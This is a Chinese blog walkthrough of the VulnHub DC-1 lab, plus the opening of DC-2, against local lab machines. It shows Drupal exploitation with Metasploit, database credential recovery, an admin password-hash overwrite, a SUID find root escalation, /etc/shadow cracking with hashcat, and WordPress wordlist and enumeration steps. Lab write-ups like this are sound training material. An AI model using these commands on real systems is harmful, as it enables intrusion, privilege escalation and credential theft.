<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/upload/apple-touch-icon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/upload/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/upload/favicon-16x16.png">
  <link rel="mask-icon" href="/upload/kaoruko.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/7.0.0/css/all.min.css" integrity="sha256-VHqXKFhhMxcpubYf9xiWdCiojEbY9NexQ4jh8AxbvcM=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"hllttz.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.25.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="DC靶机渗透记录">
<meta property="og:type" content="article">
<meta property="og:title" content="DC靶机渗透">
<meta property="og:url" content="https://hllttz.github.io/2025/10/09/DC%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/index.html">
<meta property="og:site_name" content="hllttz&#39;s blog">
<meta property="og:description" content="DC靶机渗透记录">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251009215753111.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251009220117526.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251009220206544.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251009220416935.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251009221208770.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251009221901690.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251009222129485.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251009222438945.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251009222659056.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251009223227047.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251009223414472.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251009223705444.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251009224038698.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251009230942697.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251009231122449.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251009231300601.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251010182437402.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251010183437089.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251010183608803.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251010184510686.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251010184615650.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251010184703028.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251010185830978.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251010190001859.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251010190300409.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251010204245868.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251010215823481.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251010215749937.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251010230634734.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251010231648896.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251010232011091.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251010233510123.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251010233541482.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251014213739496.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251014213901159.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251014214634201.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251014214536315.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251014220953584.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251014221039408.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251014223922171.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251014225851444.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251014230114137.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251014232603852.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251014232655779.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251015210410268.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251015210847024.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251015211620203.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251015212156335.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251015212539574.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251015212737508.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251015212859783.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251015213118531.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251015214311952.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251015220950693.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251015223716256.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251015223836538.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251015231214524.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251015231338507.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251016193429386.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251016193507054.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251016193919643.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251016194810484.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251016201808339.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251016203551173.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251016203818403.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251016204109760.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251016204552176.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251016205651004.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251017223143352.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251017223207204.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251017224507116.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251017223717151.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251017223742836.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251017224709039.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251017224720650.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251017224856900.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251017225605617.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251017225625844.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251017225921408.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251017230154856.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251018164348226.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251018165352517.png">
<meta property="og:image" content="https://hllttz.github.io/images/image-20251018165438131.png">
<meta property="article:published_time" content="2025-10-09T13:55:31.000Z">
<meta property="article:modified_time" content="2025-10-18T09:12:16.560Z">
<meta property="article:author" content="hllttz">
<meta property="article:tag" content="靶机 wp">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://hllttz.github.io/images/image-20251009215753111.png">


<link rel="canonical" href="https://hllttz.github.io/2025/10/09/DC%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://hllttz.github.io/2025/10/09/DC%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/","path":"2025/10/09/DC靶机渗透/","title":"DC靶机渗透"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>DC靶机渗透 | hllttz's blog</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  






  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">hllttz's blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">17</span></a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">15</span></a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">20</span></a></li><li class="menu-item menu-item-schedule"><a href="/schedule/" rel="section"><i class="fa fa-calendar fa-fw"></i>日程表</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%9D%B6%E6%9C%BA%E7%9A%84%E4%B8%8B%E8%BD%BD%E5%8F%8A%E6%90%AD%E5%BB%BA"><span class="nav-number">1.</span> <span class="nav-text">靶机的下载及搭建</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#DC-1"><span class="nav-number">2.</span> <span class="nav-text">DC-1</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-number">2.1.</span> <span class="nav-text">信息收集</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%89%93%E7%82%B9"><span class="nav-number">2.2.</span> <span class="nav-text">打点</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%95%B0%E6%8D%AE%E5%BA%93%E6%B8%97%E9%80%8F"><span class="nav-number">2.3.</span> <span class="nav-text">数据库渗透</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#DC-2"><span class="nav-number">3.</span> <span class="nav-text">DC-2</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#DC-3"><span class="nav-number">4.</span> <span class="nav-text">DC-3</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#DC-4"><span class="nav-number">5.</span> <span class="nav-text">DC-4</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#DC-5"><span class="nav-number">6.</span> <span class="nav-text">DC-5</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">hllttz</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">20</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">15</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">17</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://hllttz.github.io/2025/10/09/DC%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="hllttz">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="hllttz's blog">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="DC靶机渗透 | hllttz's blog">
      <meta itemprop="description" content="DC靶机渗透记录">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          DC靶机渗透
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2025-10-09 21:55:31" itemprop="dateCreated datePublished" datetime="2025-10-09T21:55:31+08:00">2025-10-09</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2025-10-18 17:12:16" itemprop="dateModified" datetime="2025-10-18T17:12:16+08:00">2025-10-18</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E9%9D%B6%E6%9C%BA-wp/" itemprop="url" rel="index"><span itemprop="name">靶机 wp</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>11k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>10 分钟</span>
    </span>
</div>

            <div class="post-description">DC靶机渗透记录</div>
        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="靶机的下载及搭建"><a href="#靶机的下载及搭建" class="headerlink" title="靶机的下载及搭建"></a>靶机的下载及搭建</h1><p>下载地址：<a target="_blank" rel="noopener" href="https://download.vulnhub.com/dc/DC-1.zip">https://download.vulnhub.com/dc/DC-1.zip</a></p>
<p>下载后解压得到一个ova文件，用vm打开，报错没事，重试即可。然后启动靶机</p>
<p><img src="/images/image-20251009215753111.png" alt="image-20251009215753111"></p>
<p>出现这个界面之后即可，然后把靶机的网络模式改为NAT，确保靶机和kali处于同一网段</p>
<h1 id="DC-1"><a href="#DC-1" class="headerlink" title="DC-1"></a>DC-1</h1><h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p>在靶机设置里获取靶机的mac地址</p>
<img src="/images/image-20251009220117526.png" alt="image-20251009220117526" style="zoom:50%;" />

<p>在kali中：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">arp-scan -l</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251009220206544.png" alt="image-20251009220206544"></p>
<p>得到靶机的ip为<code>192.168.243.136</code></p>
<p><strong>nmap扫描</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -A 192.168.243.136</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251009220416935.png" alt="image-20251009220416935"></p>
<p>开放了<code>22</code>,<code>80</code>,<code>111</code>端口,先尝试一下ssh爆破</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap --script=ssh-brute 192.168.243.136</span><br></pre></td></tr></table></figure>

<p>爆破了很久无果，果断放弃</p>
<p><img src="/images/image-20251009221208770.png" alt="image-20251009221208770"></p>
<p><strong>访问80端口</strong></p>
<p>访问<code>192.168.243.136</code></p>
<p><img src="/images/image-20251009221901690.png" alt="image-20251009221901690"></p>
<p>当然也可以用kali的<code>whatweb</code>扫描</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">whatweb -v 192.168.243.136</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251009222129485.png" alt="image-20251009222129485"></p>
<p>现在收集的信息：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">CMS是Drupal</span><br><span class="line">Apache 2.2.22</span><br><span class="line">PHP 5.4.45</span><br><span class="line">jQuery 1.4.4 </span><br></pre></td></tr></table></figure>

<h2 id="打点"><a href="#打点" class="headerlink" title="打点"></a>打点</h2><p><strong>使用Metasploit进行漏扫</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br><span class="line">search Drupal</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251009222438945.png" alt="image-20251009222438945"></p>
<p>使用披露时间为<code>2018-03-28</code>的漏洞,接着看一下该漏洞模块参数</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show options</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251009222659056.png" alt="image-20251009222659056"></p>
<blockquote>
<p>Current Setting是目前设置的内容</p>
<p>Required表示是否需要设置内容，yes为必须设置，no可以设置也可不设置</p>
<p>就上面来说RHOSTS需要set，但是没有内容</p>
</blockquote>
<p>所以接着我们来设置一下RHOSTS内容（就是攻击目标IP地址，靶场地址）</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">set</span> RHOSTS 192.168.243.136</span><br></pre></td></tr></table></figure>

<p>然后进行攻击</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">run</span><br><span class="line">或者</span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251009223227047.png" alt="image-20251009223227047"></p>
<p>当出现Meterpreter session 1 opened（kali和目标ip的连接）就说明攻击成功</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">shell</span><br><span class="line"><span class="built_in">whoami</span></span><br><span class="line">python -c <span class="string">&#x27;import pty; pty.spawn(&quot;/bin/bash&quot;)&#x27;</span></span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251009223414472.png" alt="image-20251009223414472"></p>
<p>先把flag1拿了</p>
<p><img src="/images/image-20251009223705444.png" alt="image-20251009223705444"></p>
<p>得到个提示，搜索得知这个cms的配置文件是<code>settings.php</code>文件，找一下这个文件的位置</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">find / -name settings.php</span><br><span class="line"></span><br><span class="line">www-data@DC-1:/var/www$ find / -name settings.php</span><br><span class="line">find / -name settings.php</span><br><span class="line">/var/www/sites/default/settings.php</span><br><span class="line"></span><br><span class="line"><span class="built_in">cat</span> /var/www/sites/default/settings.php</span><br></pre></td></tr></table></figure>

<p>得到flag2</p>
<p><img src="/images/image-20251009224038698.png"></p>
<p>数据库的账号密码<code>dbuser/R0ck3t</code></p>
<h2 id="数据库渗透"><a href="#数据库渗透" class="headerlink" title="数据库渗透"></a>数据库渗透</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mysql -udbuser -pR0ck3t</span><br><span class="line">show databases;</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251009230942697.png" alt="image-20251009230942697"></p>
<p>接着使用<code>drupaldb</code>数据库并查看表</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">use drupaldb;show tables;</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251009231122449.png" alt="image-20251009231122449"></p>
<p>查看一下<code>users</code>表里的内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from users;</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251009231300601.png" alt="image-20251009231300601"></p>
<p>得到<code>admin</code>和<code>Ferd</code>用户的pass字段，尝试一下更改<code>admin</code>的<code>pass</code>字段，实现任意密码重置</p>
<p><a target="_blank" rel="noopener" href="https://drupalchina.cn/node/2128">https://drupalchina.cn/node/2128</a></p>
<p><img src="/images/image-20251010182437402.png" alt="image-20251010182437402"></p>
<p>得知drupal的密码加密脚本存放在<code>/var/www/scripts/password-hash.sh</code>，重置密码的使用方法如下</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">php /var/www/scripts/password-hash.sh 123456</span><br><span class="line">password: 123456                <span class="built_in">hash</span>: $S<span class="variable">$D</span>/MdQUfce0ZBmd4yIPvIS7F8TnbstjOrCa9M9u8NkdS3tzer0mha</span><br></pre></td></tr></table></figure>

<p>然后进mysql进行替换</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">use drupaldb;update users set pass = &quot;$S$D/MdQUfce0ZBmd4yIPvIS7F8TnbstjOrCa9M9u8NkdS3tzer0mha&quot; where name = &quot;admin&quot;;</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251010183437089.png" alt="image-20251010183437089"></p>
<p>更改成功，我们回到web主页尝试登录</p>
<p><img src="/images/image-20251010183608803.png" alt="image-20251010183608803"></p>
<p>得到flag3，我们需要得到<code>/etc/shadow</code>的内容，并且FIND是大写且跟了<code>-exec</code>，尝试find提权</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -perm -u=s -<span class="built_in">type</span> f 2&gt;/dev/null 或者 <span class="built_in">which</span> find <span class="built_in">ls</span> -l  /usr/bin/find </span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251010184510686.png" alt="image-20251010184510686"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find /usr/bin/find -<span class="built_in">exec</span> <span class="string">&quot;/bin/sh&quot;</span> \;</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251010184615650.png" alt="image-20251010184615650"></p>
<p>成功提权，访问<code>/etc/shadow</code></p>
<p><img src="/images/image-20251010184703028.png" alt="image-20251010184703028"></p>
<p>尝试进行爆破，将最后一行复制到2.txt，进行爆破</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hashcat -m 1800 2.txt /usr/share/wordlists/rockyou.txt</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251010185830978.png" alt="image-20251010185830978"></p>
<p>得到密码<code>orange</code>，ssh链接</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh flag4@192.168.243.136</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251010190001859.png" alt="image-20251010190001859"></p>
<p>得到flag4，提示我们要在<code>/root</code>下得到flag，前面已经提权。这步好办</p>
<p><img src="/images/image-20251010190300409.png" alt="image-20251010190300409"></p>
<p>得到最终flag</p>
<h1 id="DC-2"><a href="#DC-2" class="headerlink" title="DC-2"></a>DC-2</h1><p><strong>ip扫描</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/桌面]</span><br><span class="line">└─# arp-scan -l</span><br><span class="line">Interface: eth0, <span class="built_in">type</span>: EN10MB, MAC: 00:0c:29:34:06:95, IPv4: 192.168.243.129</span><br><span class="line">Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)</span><br><span class="line">192.168.243.1   00:50:56:c0:00:08       VMware, Inc.</span><br><span class="line">192.168.243.2   00:50:56:f9:0d:90       VMware, Inc.</span><br><span class="line">192.168.243.137 00:0c:29:2a:e6:70       VMware, Inc.</span><br><span class="line">192.168.243.254 00:50:56:e1:bb:61       VMware, Inc.</span><br></pre></td></tr></table></figure>

<p>得到ip为192.168.243.137，nmap扫描</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -A -p 1-65535 192.168.243.137</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251010204245868.png" alt="image-20251010204245868"></p>
<p>开放了80端口，ssh端口改到了7744,尝试访问web端会重定向到<code>http://dc-2</code>。我们本地dns绑定下</p>
<p>host编辑页在<code>C:\Windows\System32\drivers\etc</code>中</p>
<p><img src="/images/image-20251010215823481.png" alt="image-20251010215823481"></p>
<p>就能进去了</p>
<p><img src="/images/image-20251010215749937.png" alt="image-20251010215749937"></p>
<p>直接就能进去了，拿到第一个flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">Flag 1:</span><br><span class="line"></span><br><span class="line">Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.</span><br><span class="line"></span><br><span class="line">More passwords is always better, but sometimes you just can’t win them all.</span><br><span class="line"></span><br><span class="line">Log in as one to see the next flag.</span><br><span class="line"></span><br><span class="line">If you can’t find it, log in as another.</span><br></pre></td></tr></table></figure>

<p>搜索cewl，是一个字典生成工具</p>
<blockquote>
<p>Cewl是一款采用Ruby开发的应用程序，你可以给它的爬虫指定URL地址和爬取深度，还可以添额外的外部链接，接下来Cewl会给你返回一个字典文件，高度契当前的网站。你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外，Cewl还提供了命令行工具。</p>
</blockquote>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cewl http://dc-2 -w passwd.txt  </span><br></pre></td></tr></table></figure>

<p>生成如下字典</p>
<p><img src="/images/image-20251010230634734.png" alt="image-20251010230634734"></p>
<p>使用dirsearch扫描登录目录</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python dirsearch.py -u http://dc-2</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251010231648896.png" alt="image-20251010231648896"></p>
<p><code>/wp-login.php</code>为登录页面，针对wordpress使用wpscan枚举用户名</p>
